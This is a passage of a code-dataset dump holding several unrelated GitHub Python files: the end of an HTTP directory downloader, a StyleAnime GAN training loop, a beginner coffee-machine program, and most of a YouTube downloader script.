fp.read().decode('utf8')\n CatchStartTag(lambda h: add(url + h,\n os.path.join(folder, h) if h.endswith('/') else folder)).feed(html)\n else:\n os.makedirs(folder, exist_ok=True)\n filename = os.path.join(folder, url.split('/')[-1])\n if not os.path.exists(filename):\n print('downloading', url, 'to', filename)\n urllib.request.urlretrieve(url, filename)\n\n\nif __name__ == '__main__':\n # download_files_in_url('http://foo.inf.usi.ch:8000/', './temp/download')\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Synthetic Dataset generation\")\n parser.add_argument(\"--url\", type=str, dest=\"url\", required=True, help=\"url to download from\")\n parser.add_argument(\"--folder\", type=str, dest=\"folder\", required=True, help=\"folder to download to\")\n args = parser.parse_args()\n download_files_in_url(args.url, args.folder)\n","repo_name":"simonegiacomelli/code2vec-satd-classifier","sub_path":"code2vec-satd/colab/utils/download_http_server.py","file_name":"download_http_server.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24641566835","text":"import os\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\nmatplotlib.use('Agg')\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport torch.nn.functional as F\r\n\r\nfrom utils import common, train_utils\r\nfrom criteria import id_loss, w_norm\r\nfrom configs import data_configs\r\nfrom datasets.images_dataset import ImagesDataset\r\nfrom criteria.lpips.lpips import LPIPS\r\nfrom models.styleAnime import StyleAnime\r\n\r\nfrom training.ranger import Ranger\r\nfrom hm import hm_loss\r\nfrom models.stylegan2.model import Discriminator, Discriminator_light\r\nimport torch.autograd as autograd\r\nfrom models.discriminator_latent import LatentCodesDiscriminator\r\nclass L1Loss(nn.Module):\r\n def __init__(self):\r\n super(L1Loss, self).__init__()\r\n\r\n def __call__(self, in0, in1):\r\n return torch.sum(torch.abs(in0 - in1), dim=1, keepdim=True)\r\n\r\nclass Coach:\r\n\tdef __init__(self, opts):\r\n\t\tself.opts = opts\r\n\r\n\t\tself.global_step = 0\r\n\r\n\t\tself.device = 'cuda:0' # TODO: Allow multiple GPU? currently using CUDA_VISIBLE_DEVICES\r\n\t\tself.opts.device = self.device\r\n\r\n\t\t# Initialize network\r\n\t\tself.net = StyleAnime(self.opts).to(self.device)\r\n\t\tself.dis = Discriminator(size=256).to(self.device)\r\n\t\t#self.dis = Discriminator_light().to(self.device)\r\n\t\tself.dis_latent = LatentCodesDiscriminator(style_dim=512, n_mlp=4).to(self.device)\r\n\t\t# Initialize loss\r\n\t\tif self.opts.lpips_lambda > 0:\r\n\t\t\tself.lpips_loss = LPIPS(net_type='alex').to(self.device).eval()\r\n\t\tif self.opts.id_lambda > 0:\r\n\t\t\tself.id_loss = id_loss.IDLoss().to(self.device).eval()\r\n\t\tif self.opts.w_norm_lambda > 0:\r\n\t\t\tself.w_norm_loss = w_norm.WNormLoss(start_from_latent_avg=self.opts.start_from_latent_avg)\r\n\r\n\t\tif self.opts.hm_lambda > 0:\r\n\t\t\tself.hm_loss = hm_loss.HMLoss(lambda_his_face=opts.lambda_his_face, lambda_his_hair=opts.lambda_his_hair, lambda_his_eye=opts.lambda_his_eye)\r\n\r\n\t\tself.mse_loss = nn.MSELoss().to(self.device).eval()\r\n\r\n\r\n\t\t# Initialize optimizer\r\n\t\tself.optimizer, self.optimizer_d, self.optimizer_latent = self.configure_optimizers()\r\n\r\n\t\t# Initialize dataset\r\n\t\tself.train_dataset, self.test_dataset = self.configure_datasets()\r\n\t\tself.train_dataloader = DataLoader(self.train_dataset,\r\n\t\t\t\t\t\t\t\t\t\t batch_size=self.opts.batch_size,\r\n\t\t\t\t\t\t\t\t\t\t shuffle=True,\r\n\t\t\t\t\t\t\t\t\t\t num_workers=int(self.opts.workers),\r\n\t\t\t\t\t\t\t\t\t\t drop_last=True)\r\n\t\tself.test_dataloader = DataLoader(self.test_dataset,\r\n\t\t\t\t\t\t\t\t\t\t batch_size=self.opts.test_batch_size,\r\n\t\t\t\t\t\t\t\t\t\t shuffle=False,\r\n\t\t\t\t\t\t\t\t\t\t num_workers=int(self.opts.test_workers),\r\n\t\t\t\t\t\t\t\t\t\t drop_last=True)\r\n\r\n\t\t# Initialize logger\r\n\t\tlog_dir = os.path.join(opts.exp_dir, 'logs')\r\n\t\tos.makedirs(log_dir, exist_ok=True)\r\n\t\tself.logger = SummaryWriter(log_dir=log_dir)\r\n\r\n\t\t# Initialize checkpoint dir\r\n\t\tself.checkpoint_dir = os.path.join(opts.exp_dir, 'checkpoints')\r\n\t\tos.makedirs(self.checkpoint_dir, exist_ok=True)\r\n\t\tself.best_val_loss = None\r\n\t\tif self.opts.save_interval is None:\r\n\t\t\tself.opts.save_interval = self.opts.max_steps\r\n\r\n\tdef train(self):\r\n\t\tself.net.train()\r\n\t\twhile self.global_step < self.opts.max_steps:\r\n\t\t\tfor batch_idx, batch in enumerate(self.train_dataloader):\r\n\t\t\t\t\r\n\t\t\t\tx_hm, x, y, x_1, y_1 = batch\r\n\t\t\t\tx_hm, x, y, x_1, y_1 = x_hm.to(self.device).float(), x.to(self.device).float(), y.to(self.device).float(), x_1.to(self.device).float(), y_1.to(self.device).float()\r\n\t\t\t\t\r\n\t\t\t\ty_hat, latent = self.net.forward(x,y, return_latents=True)\r\n\t\t\t\ty_hat_1, latent_1 = self.net.forward(x_1, y_1, return_latents=True)\r\n\r\n\r\n\t\t\t\tif self.opts.loss_adv_weight_latent > 0: \r\n\t\t\t\t\tcode_real = self.dis_latent(latent)\r\n\t\t\t\t\tcode_fake = self.dis_latent(latent_1)\r\n\r\n\t\t\t\t\tcode_loss = self.discriminator_latent_loss(code_real, code_fake)\r\n\t\t\t\t\tself.optimizer_latent.zero_grad()\r\n\t\t\t\t\tcode_loss.backward()\r\n\t\t\t\t\tself.optimizer_latent.step()\r\n\r\n\t\t\t\tif self.opts.loss_adv_weight > 0:\r\n\t\t\t\t\ty_real = self.dis(y)\r\n\t\t\t\t\ty_fake = self.dis(y_hat.detach())\r\n\t\t\t\t\ty_fake_1 = self.dis(y_hat_1.detach())\r\n\r\n\t\t\t\t\tloss_real = self.GAN_loss(y_real, real=True)\r\n\t\t\t\t\tloss_fake = self.GAN_loss(y_fake, real=False)\r\n\t\t\t\t\tloss_fake_1 = self.GAN_loss(y_fake_1, real=False)\r\n\t\t\t\t\tloss_gp = self.div_loss_(y, y_hat.detach(), cuda=self.device)\r\n\r\n\t\t\t\t\td_loss = loss_real + loss_fake + 5 * loss_gp + loss_fake_1\r\n\t\t\t\t\t#d_loss = loss_real + loss_fake + 5 * loss_gp + loss_fake_1*self.opts.adv_lambda_two\r\n\t\t\t\t\tself.optimizer_d.zero_grad()\r\n\t\t\t\t\td_loss.backward()\r\n\t\t\t\t\tself.optimizer_d.step()\r\n\t\t\t\t\r\n\r\n\t\t\t\ty_hat, latent = self.net.forward(x,y, return_latents=True)\r\n\t\t\t\ty_hat_1, latent_1 = self.net.forward(x_1, y_1, return_latents=True)\r\n\r\n\t\t\t\tloss, loss_dict, id_logs = self.calc_loss(x_hm, x, y, y_hat, latent, y_hat_1, latent_1)\r\n\r\n\t\t\t\tself.optimizer.zero_grad()\r\n\t\t\t\tloss.backward()\r\n\t\t\t\t#torch.nn.utils.clip_grad_norm_(self.net.encoder.parameters(), 1)\r\n\t\t\t\tself.optimizer.step()\r\n\r\n\t\t\t\t# Logging related\r\n\t\t\t\tif self.global_step % self.opts.image_interval == 0 or (\r\n\t\t\t\t\t\tself.global_step < 1000 and self.global_step % 25 == 0):\r\n\t\t\t\t\tself.parse_and_log_images(id_logs, x, y, y_hat, title='images/train/faces')\r\n\t\t\t\tif self.global_step % self.opts.board_interval == 0:\r\n\t\t\t\t\tself.print_metrics(loss_dict, prefix='train')\r\n\t\t\t\t\tself.log_metrics(loss_dict, prefix='train')\r\n\r\n\t\t\t\t# Validation related\r\n\t\t\t\tval_loss_dict = None\r\n\t\t\t\tif self.global_step % self.opts.val_interval == 0 or self.global_step == self.opts.max_steps:\r\n\t\t\t\t\tval_loss_dict = self.validate()\r\n\t\t\t\t\tif val_loss_dict and (self.best_val_loss is None or val_loss_dict['loss'] < self.best_val_loss):\r\n\t\t\t\t\t\tself.best_val_loss = val_loss_dict['loss']\r\n\t\t\t\t\t\tself.checkpoint_me(val_loss_dict, is_best=True)\r\n\r\n\t\t\t\tif self.global_step % self.opts.save_interval == 0 or self.global_step == self.opts.max_steps:\r\n\t\t\t\t\tif val_loss_dict is not None:\r\n\t\t\t\t\t\tself.checkpoint_me(val_loss_dict, is_best=False)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.checkpoint_me(loss_dict, is_best=False)\r\n\r\n\t\t\t\tif self.global_step == self.opts.max_steps:\r\n\t\t\t\t\tprint('OMG, finished training!')\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\t\tself.global_step += 1\r\n\r\n\tdef validate(self):\r\n\t\tself.net.eval()\r\n\t\tagg_loss_dict = []\r\n\t\tfor batch_idx, batch in enumerate(self.test_dataloader):\r\n\t\t\tx_hm, x, y, x_1, y_1 = batch\r\n\r\n\t\t\twith torch.no_grad():\r\n\t\t\t\tx_hm, x, y, x_1, y_1 = x_hm.to(self.device).float(), x.to(self.device).float(), y.to(self.device).float(), x_1.to(self.device).float(), y_1.to(self.device).float()\r\n\t\t\t\ty_hat, latent = self.net.forward(x, y, return_latents=True)\r\n\t\t\t\ty_hat_1, latent_1 = self.net.forward(x_1, y_1, return_latents=True)\r\n\r\n\r\n\t\t\t\tloss, cur_loss_dict, id_logs = self.calc_loss(x_hm, x, y, y_hat, latent, y_hat_1, latent_1)\r\n\t\t\tagg_loss_dict.append(cur_loss_dict)\r\n\r\n\t\t\t# Logging related\r\n\t\t\tself.parse_and_log_images(id_logs, x, y, y_hat,\r\n\t\t\t\t\t\t\t\t\t title='images/test/faces',\r\n\t\t\t\t\t\t\t\t\t subscript='{:04d}'.format(batch_idx))\r\n\r\n\t\t\t# For first step just do sanity test on small amount of data\r\n\t\t\tif self.global_step == 0 and batch_idx >= 4:\r\n\t\t\t\tself.net.train()\r\n\t\t\t\treturn None # Do not log, inaccurate in first batch\r\n\r\n\t\tloss_dict = train_utils.aggregate_loss_dict(agg_loss_dict)\r\n\t\tself.log_metrics(loss_dict, prefix='test')\r\n\t\tself.print_metrics(loss_dict, prefix='test')\r\n\r\n\t\tself.net.train()\r\n\t\treturn loss_dict\r\n\r\n\tdef checkpoint_me(self, loss_dict, is_best):\r\n\t\tsave_name = 'best_model.pt' if is_best else 'iteration_{}.pt'.format(self.global_step)\r\n\t\tsave_dict = self.__get_save_dict()\r\n\t\tcheckpoint_path = os.path.join(self.checkpoint_dir, save_name)\r\n\t\ttorch.save(save_dict, checkpoint_path)\r\n\t\twith open(os.path.join(self.checkpoint_dir, 'timestamp.txt'), 'a') as f:\r\n\t\t\tif is_best:\r\n\t\t\t\tf.write('**Best**: Step - {}, Loss - {:.3f} \\n{}\\n'.format(self.global_step, self.best_val_loss, loss_dict))\r\n\t\t\telse:\r\n\t\t\t\tf.write('Step - {}, \\n{}\\n'.format(self.global_step, loss_dict))\r\n\r\n\tdef configure_optimizers(self):\r\n\t\tparams = list(self.net.encoder.parameters())\r\n\t\tif self.opts.train_decoder:\r\n\t\t\tparams += list(self.net.decoder.parameters())\r\n\t\tif self.opts.optim_name == 'adam':\r\n\t\t\toptimizer = torch.optim.Adam(params, lr=self.opts.learning_rate)\r\n\t\telse:\r\n\t\t\toptimizer = Ranger(params, lr=self.opts.learning_rate)\r\n\t\tparams_d = list(self.dis.parameters())\r\n\t\toptimizer_d = torch.optim.Adam(params_d, lr=self.opts.learning_rate_d)\r\n\r\n\t\tparams_latent = list(self.dis_latent.parameters())\r\n\t\toptimizer_latent = torch.optim.Adam(params_latent, lr=self.opts.learning_rate_d_latent)\r\n\t\treturn optimizer, optimizer_d, optimizer_latent\r\n\r\n\tdef configure_datasets(self):\r\n\t\tif self.opts.dataset_type not in data_configs.DATASETS.keys():\r\n\t\t\tException('{} is not a valid dataset_type'.format(self.opts.dataset_type))\r\n\t\tprint('Loading dataset for {}'.format(self.opts.dataset_type))\r\n\t\tdataset_args = data_configs.DATASETS[self.opts.dataset_type]\r\n\t\ttransforms_dict = dataset_args['transforms'](self.opts).get_transforms()\r\n\t\ttrain_dataset_celeba = ImagesDataset(source_root=dataset_args['train_source_root'],\r\n\t\t target_root=dataset_args['train_target_root'],\r\n\t\t\t\t\t\t\t\t\t\t\t face_source_root=dataset_args['face_train_source_root'],\r\n\t\t\t\t\t\t\t\t\t\t\t face_target_root=dataset_args['face_train_target_root'],\r\n\t\t source_transform=transforms_dict['transform_source'],\r\n\t\t target_transform=transforms_dict['transform_gt_train'],\r\n\t\t opts=self.opts)\r\n\t\ttest_dataset_celeba = ImagesDataset(source_root=dataset_args['test_source_root'],\r\n\t\t target_root=dataset_args['test_target_root'],\r\n\t\t\t\t\t\t\t\t\t\t\tface_source_root=dataset_args['face_test_source_root'],\r\n\t\t\t\t\t\t\t\t\t\t\tface_target_root=dataset_args['face_test_target_root'],\r\n\t\t source_transform=transforms_dict['transform_source'],\r\n\t\t target_transform=transforms_dict['transform_test'],\r\n\t\t opts=self.opts)\r\n\t\ttrain_dataset = train_dataset_celeba\r\n\t\ttest_dataset = test_dataset_celeba\r\n\t\tprint(\"Number of training samples: {}\".format(len(train_dataset)))\r\n\t\tprint(\"Number of test samples: {}\".format(len(test_dataset)))\r\n\t\treturn train_dataset, test_dataset\r\n\r\n\tdef calc_loss(self, x_hm, x, y, y_hat, latent, y_hat_1, latent_1):\r\n\t\tloss_dict = {}\r\n\t\tloss = 0.0\r\n\t\tid_logs = None\r\n\t\tif self.opts.id_lambda > 0:\r\n\t\t\tloss_id, sim_improvement, id_logs = self.id_loss(y_hat, y, x)\r\n\t\t\tloss_dict['loss_id'] = float(loss_id)\r\n\t\t\tloss_dict['id_improve'] = float(sim_improvement)\r\n\t\t\tloss = loss_id * self.opts.id_lambda\r\n\t\tif self.opts.l2_lambda > 0:\r\n\t\t\tloss_l2 = F.mse_loss(y_hat, y)\r\n\t\t\tloss_dict['loss_l2'] = float(loss_l2)\r\n\t\t\tloss += loss_l2 * self.opts.l2_lambda\r\n\t\tif self.opts.lpips_lambda > 0:\r\n\t\t\tloss_lpips = self.lpips_loss(y_hat, y)\r\n\t\t\tloss_dict['loss_lpips'] = float(loss_lpips)\r\n\t\t\tloss += loss_lpips * self.opts.lpips_lambda\r\n\t\tif self.opts.lpips_lambda_crop > 0:\r\n\t\t\tloss_lpips_crop = self.lpips_loss(y_hat[:, :, 35:223, 32:220], y[:, :, 35:223, 32:220])\r\n\t\t\tloss_dict['loss_lpips_crop'] = float(loss_lpips_crop)\r\n\t\t\tloss += loss_lpips_crop * self.opts.lpips_lambda_crop\r\n\t\tif self.opts.l2_lambda_crop > 0:\r\n\t\t\tloss_l2_crop = F.mse_loss(y_hat[:, :, 35:223, 32:220], y[:, :, 35:223, 32:220])\r\n\t\t\tloss_dict['loss_l2_crop'] = float(loss_l2_crop)\r\n\t\t\tloss += loss_l2_crop * self.opts.l2_lambda_crop\r\n\t\tif self.opts.w_norm_lambda > 0:\r\n\t\t\tloss_w_norm = self.w_norm_loss(latent, self.net.latent_avg)\r\n\t\t\tloss_dict['loss_w_norm'] = float(loss_w_norm)\r\n\t\t\tloss += loss_w_norm * self.opts.w_norm_lambda\r\n\t\tif self.opts.w_norm_lambda_1 > 0:\r\n\t\t\tloss_w_norm_1 = self.w_norm_loss(latent_1, self.net.latent_avg)\r\n\t\t\tloss_dict['loss_w_norm_1'] = float(loss_w_norm_1)\r\n\t\t\tloss += loss_w_norm_1 * self.opts.w_norm_lambda_1\r\n\t\tif self.opts.hm_lambda > 0:\r\n\t\t\tloss_hm = self.hm_loss(y_hat, y, x_hm, x_hm)\r\n\t\t\tloss_dict['loss_hm'] = float(loss_hm)\r\n\t\t\tloss += loss_hm * self.opts.hm_lambda\r\n\t\tif self.opts.loss_adv_weight > 0:\r\n\t\t\ty_adv = self.dis(y_hat)\r\n\t\t\tloss_adv = self.GAN_loss(y_adv, real=True)\r\n\t\t\tloss_dict['loss_adv'] = float(loss_adv)\r\n\t\t\tloss += loss_adv * self.opts.loss_adv_weight\r\n\t\tif self.opts.loss_adv_weight_latent > 0:\r\n\t\t\ty_adv_latent = self.dis_latent(latent_1)\r\n\t\t\tloss_adv_latent = F.softplus(-y_adv_latent).mean()\r\n\t\t\tloss_dict['loss_adv_latent'] = float(loss_adv_latent)\r\n\t\t\tloss += loss_adv_latent * self.opts.loss_adv_weight_latent\r\n\r\n\t\tloss_dict['loss'] = float(loss)\r\n\t\treturn loss, loss_dict, id_logs\r\n\r\n\tdef log_metrics(self, metrics_dict, prefix):\r\n\t\tfor key, value in metrics_dict.items():\r\n\t\t\tself.logger.add_scalar('{}/{}'.format(prefix, key), value, self.global_step)\r\n\r\n\tdef print_metrics(self, metrics_dict, prefix):\r\n\t\tprint('Metrics for {}, step {}'.format(prefix, self.global_step))\r\n\t\tfor key, value in metrics_dict.items():\r\n\t\t\tprint('\\t{} = '.format(key), value)\r\n\r\n\tdef parse_and_log_images(self, id_logs, x, y, y_hat, title, subscript=None, display_count=1):\r\n\t\t\r\n\t\tim_data = []\r\n\t\tfor i in range(display_count):\r\n\t\t\tcur_im_data = {\r\n\t\t\t\t'input_face': common.log_input_image(x[i], self.opts),\r\n\t\t\t\t'target_face': common.tensor2im(y[i]),\r\n\t\t\t\t'output_face': common.tensor2im(y_hat[i]),\r\n\t\t\t}\r\n\t\t\tif id_logs is not None:\r\n\t\t\t\tfor key in id_logs[i]:\r\n\t\t\t\t\tcur_im_data[key] = id_logs[i][key]\r\n\t\t\tim_data.append(cur_im_data)\r\n\t\tself.log_images(title, im_data=im_data, subscript=subscript)\r\n\r\n\tdef log_images(self, name, im_data, subscript=None, log_latest=False):\r\n\t\tfig = common.vis_faces(im_data)\r\n\t\tstep = self.global_step\r\n\t\tif log_latest:\r\n\t\t\tstep = 0\r\n\t\tif subscript:\r\n\t\t\tpath = os.path.join(self.logger.log_dir, name, '{}_{:04d}.jpg'.format(subscript, step))\r\n\t\telse:\r\n\t\t\tpath = os.path.join(self.logger.log_dir, name, '{:04d}.jpg'.format(step))\r\n\t\tos.makedirs(os.path.dirname(path), exist_ok=True)\r\n\t\tfig.savefig(path)\r\n\t\tplt.close(fig)\r\n\r\n\tdef __get_save_dict(self):\r\n\t\tsave_dict = {\r\n\t\t\t'state_dict': self.net.state_dict(),\r\n\t\t\t'opts': vars(self.opts)\r\n\t\t}\r\n\t\t# save the latent avg in state_dict for inference if truncation of w was used during training\r\n\t\tif self.opts.start_from_latent_avg:\r\n\t\t\tsave_dict['latent_avg'] = self.net.latent_avg\r\n\t\treturn save_dict\r\n\t\r\n\tdef GAN_loss(self, scores_out, real=True):\r\n\t\tif real:\r\n\t\t\treturn torch.mean(F.softplus(-scores_out))\r\n\t\telse:\r\n\t\t\treturn torch.mean(F.softplus(scores_out))\r\n\r\n\tdef div_loss_(self, real_x, fake_x, p=2, cuda=False):\r\n # if cuda:\r\n\t\tx_ = real_x.requires_grad_(True)\r\n\t\ty_ = self.dis(x_)\r\n\t\t# cal f'(x)\r\n\t\tgrad = autograd.grad(\r\n\t\t\toutputs=y_,\r\n\t\t\tinputs=x_,\r\n\t\t\tgrad_outputs=torch.ones_like(y_),\r\n\t\t\tcreate_graph=True,\r\n\t\t\tretain_graph=True,\r\n\t\t\tonly_inputs=True,\r\n\t\t\t)[0]\r\n\t\t# grad = grad.view(x_.shape[0], -1)\r\n\t\t# div = (grad.norm(2, dim=1) ** p).mean()\r\n\t\tdiv = (grad * grad).sum(dim=1, keepdim=True).sum(dim=2, keepdim=True).sum(dim=3, keepdim=True)\r\n\t\tdiv = torch.mean(div)\r\n\t\treturn div\r\n\r\n\tdef div_loss(self, x, y, r1_gamma=10.0, cuda=False):\r\n\t\tx_ = x.requires_grad_(True)\r\n\t\ty_ = self.dis(x_)\r\n\t\tgrad = autograd.grad(\r\n\t\t\toutputs=y_,\r\n\t\t\tinputs=x_,\r\n\t\t\tgrad_outputs=torch.ones_like(y_),\r\n\t\t\tcreate_graph=True,\r\n\t\t\tretain_graph=True,\r\n\t\t\tonly_inputs=True,\r\n\t\t\t)[0]\r\n\t\tgrad = grad * grad\r\n\t\tgrad = grad.sum(dim=1, keepdim=True).sum(dim=2, keepdim=True).sum(dim=3, keepdim=True)\r\n\t\tloss = grad.mean()\r\n\t\treturn loss\r\n\r\n\tdef discriminator_latent_loss(self, real_pred, fake_pred):\r\n\t\treal_loss = F.softplus(-real_pred).mean()\r\n\t\tfake_loss = F.softplus(fake_pred).mean()\r\n\t\treturn real_loss + fake_loss","repo_name":"zsl2018/StyleAnime","sub_path":"training/coach.py","file_name":"coach.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"79"} +{"seq_id":"35488870786","text":"\r\nMENU = {\r\n \"espresso\": {\r\n \"ingredients\": {\r\n \"water\": 50,\r\n \"coffee\": 18,\r\n },\r\n \"cost\": 1.5,\r\n },\r\n \"latte\": {\r\n \"ingredients\": {\r\n \"water\": 200,\r\n \"milk\": 150,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 2.5,\r\n },\r\n \"cappuccino\": {\r\n \"ingredients\": {\r\n \"water\": 250,\r\n \"milk\": 100,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 3.0,\r\n }\r\n}\r\nprofit = 0\r\nresources = {\r\n \"water\": 300,\r\n \"milk\": 200,\r\n \"coffee\": 100,\r\n}\r\n\r\ndef check_resources(order_ingredients):\r\n for item in order_ingredients:\r\n if order_ingredients[item] > resources[item]:\r\n print(f\"the {item} is not enough \")\r\n return False\r\n return True\r\n\r\n\r\n# check_resources(drink[\"ingredients\"])\r\ndef calc_coins():\r\n print(\"please insert coins\")\r\n total = int(input(\"how much quarters ? \")) * 0.25\r\n total += int(input(\"how much dimes ? \")) * 0.10\r\n total += int(input(\"how much nickels ? \")) * 0.05\r\n total += int(input(\"how much pennies ? \")) * 0.01\r\n return total\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef check_transaction(order_cost, payment):\r\n if order_cost > payment:\r\n print(\"sorry money is not enough. money refunded\")\r\n return False\r\n elif order_cost < payment:\r\n global profit\r\n profit += order_cost\r\n reminder = round(payment - order_cost, 2)\r\n print(f\"there is {reminder} a change, money refunded\")\r\n return True\r\n else:\r\n profit += order_cost\r\n return True\r\n\r\n\r\n#check_transaction(drink[\"cost\"], payment)\r\ndef make_coffee(drink_name,order_ingredients):\r\n for item in order_ingredients:\r\n resources[item]-= order_ingredients[item]\r\n print(f\"Here is your {drink_name} ☕ï¸�. Enjoy!\")\r\n return resources\r\n\r\n\r\n#make_coffe(choice,drink[\"ingredients\"])\r\ndef add_resources():\r\n resources[\"water\"]+=int(input(\"how much do you want to add to the water ? \"))\r\n resources[\"milk\"]+= int (input(\"how much do you want to add to the milk ? \"))\r\n resources[\"coffee\"]+= int (input(\"how much do you want to add to the coffee ? \"))\r\n #print(resources)\r\n return resources\r\n#add_resources()\r\ndef coffee_machine():\r\n\r\n \r\n # payment = calc_coins()\r\n still_going= True\r\n while still_going:\r\n #clear()\r\n print(\"Welcome 😊😊\")\r\n print(\"1.Shut down \\n2.Make order\\n3.Print report\\n4.Add supplies\")\r\n choicee = input(\"what would you like ? \").lower()\r\n if choicee==\"1\":\r\n still_going= False\r\n elif choicee==\"2\" :\r\n choice = input(\"what do you want to drink(espresso,latte,cappuccino) :\").lower()\r\n drink = MENU[choice]\r\n check_resources(drink[\"ingredients\"])\r\n check_transaction(drink[\"cost\"],calc_coins())\r\n make_coffee(choice,drink[\"ingredients\"])\r\n elif choicee ==\"3\":\r\n Water=resources[\"water\"]\r\n Milk=resources[\"milk\"]\r\n Coffee=resources[\"coffee\"]\r\n print(f\"{Water}\\n{Milk}\\n{Coffee}\\n{profit}\")\r\n elif choicee==\"4\":\r\n add_resources()\r\n print(f\"{Water}\\n{Milk}\\n{Coffee}\")\r\n else:\r\n print(\"input is not defined\")\r\n coffee_machine()\r\ncoffee_machine()\r\n\r\n","repo_name":"MariamElkhayat/Coffee_machine_code","sub_path":"coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36565309351","text":"import sys\n\ntry:\n import os\n from platform import system\n from pyfiglet import figlet_format\n from termcolor import colored\n from pafy import new\n from pytube import Playlist\nexcept Exception as error:\n print(colored(error, color=\"red\"))\n input(colored(\"[+]Press Any Key To Exit ..\", color=\"red\"))\n sys.exit()\n\n# To Clean The Terminal\nclear = lambda: os.system(\"cls\") if system() == \"Windows\" else os.system(\"clear\")\n\n\n# Start Class\nclass YoutubeDownloader:\n def __init__(self, url: str) -> None:\n self.url = url\n\n # Video Download Method\n def videoDownload(self) -> None:\n try:\n video = new(self.url)\n if len(video.streams) == 1:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n video.streams[0].download(filepath=path_video)\n else:\n print(colored(\"[+]Video Quality....\", color=\"blue\"))\n print(\"\\n\")\n print(colored(\"[+]640x360p \\n[+]1280x720 \\n[+]Full Quality\", color=\"blue\"))\n print()\n quality_choose = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n if quality_choose == 1:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n video.streams[0].download(filepath=path_video)\n elif quality_choose == 2:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n video.streams[1].download(filepath=path_video)\n elif quality_choose == 3:\n path_video = input(colored(\"[?]Video Path >>\", color=\"blue\"))\n dl = video.getbest()\n dl.download(filepath=path_video)\n else:\n print(colored(\"[-]You Have To Choice 1 or 2 or 3 \", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n # audio Download Method\n def audioDownload(self) -> None:\n try:\n audio = new(self.url)\n if len(audio.streams) == 1:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n audio.streams[0].download(filepath=path_audio)\n else:\n print(colored(\"[+]Video Quality....\", color=\"blue\"))\n print(\"\\n\")\n print(colored(\"[+]640x360p \\n[+]1280x720 \\n[+]Full Quality\", color=\"blue\"))\n print()\n quality_choose = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n if quality_choose == 1:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n audio.audiostreams[0].download(filepath=path_audio)\n elif quality_choose == 2:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n audio.audiostreams[1].download(filepath=path_audio)\n elif quality_choose == 3:\n path_audio = input(colored(\"[?]Audio Path >>\", color=\"blue\"))\n dl = audio.getbestaudio()\n dl.download(filepath=path_audio)\n else:\n print(colored(\"[-]You Have To Choice 1 or 2 or 3 \", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n # PlayList Download Method\n def videoPlayList(self) -> None:\n try:\n video_play_list = Playlist(self.url)\n print(colored(\"[+]Video Quality....\", color=\"blue\"))\n print(\"\\n\")\n print(colored(\"[+]Full Quality \\n[+]low Quality\", color=\"blue\"))\n print()\n quality_choose = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n if quality_choose == 1:\n path = input(colored(\"[?]Path >>\", color=\"blue\"))\n for video in video_play_list.videos:\n video.streams.get_highest_resolution().download(output_path=path)\n\n elif quality_choose == 2:\n path = input(colored(\"[?]Path >>\", color=\"blue\"))\n for video in video_play_list.videos:\n video.streams.get_lowest_resolution().download(output_path=path)\n else:\n print(colored(\"[+]you have to choose 1 or 2 or 3....\", color=\"red\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n # Video Info Method\n def videoInfo(self) -> None:\n try:\n video = new(self.url)\n print(colored(f\"[+]The Video Title Is :{video.title}\", color=\"blue\"))\n print(colored(f\"[+]The Channel Name Is: {video.author}\", color=\"blue\"))\n print(colored(f\"[+]The Video Views Is: {video.viewcount}\", color=\"blue\"))\n print(colored(f\"[+]The Video Likes Is: {video.likes}\", color=\"blue\"))\n print(colored(f\"[+]The Video Dislikes Is:{video.dislikes}\", color=\"blue\"))\n print(colored(f\"[+]The Video Time Is: {video.duration}\", color=\"blue\"))\n print(colored(f\"[+]The Video Image Is: {video.thumb}\", color=\"blue\"))\n print(colored(f\"[+]The Video ID Is: {video.videoid}\", color=\"blue\"))\n print(colored(f\"[+]The Video UserName Is: {video.username}\", color=\"blue\"))\n except Exception as e:\n print(\"\\n\")\n print(colored(e, color=\"red\"))\n sys.exit()\n\n\n# The Main Function\ndef main():\n try:\n clear()\n print(colored(figlet_format(\"Youtube Downloader \"), color=\"blue\"))\n print(\"\\n\")\n print(colored(\"\"\"\n[+]Video download\n[+]Audio download\n[+]Video PlayList download\n[+]Info video\n \"\"\", color=\"blue\"))\n print(\"\\n\")\n choice = int(input(colored(\"[?]Enter your choice >>\", color=\"blue\")))\n URl = input(colored(\"[?]Video URL >>\", color=\"blue\"))\n Youtube = YoutubeDownloader(url=URl)\n if choice == 1:\n Youtube.videoDownload()\n print(\"\\n\")\n print(colored(\"[+]DONE \", color=\"blue\"))\n elif choice == 2:\n Youtube.audioDownload()\n print(\"\\n\")\n print(colored(\"[+]DONE \", color=\"blue\"))\n elif choice == 3:\n Youtube.videoPlayList()\n print(\"\\n\")\n print(colored(\"[+]DONE \", 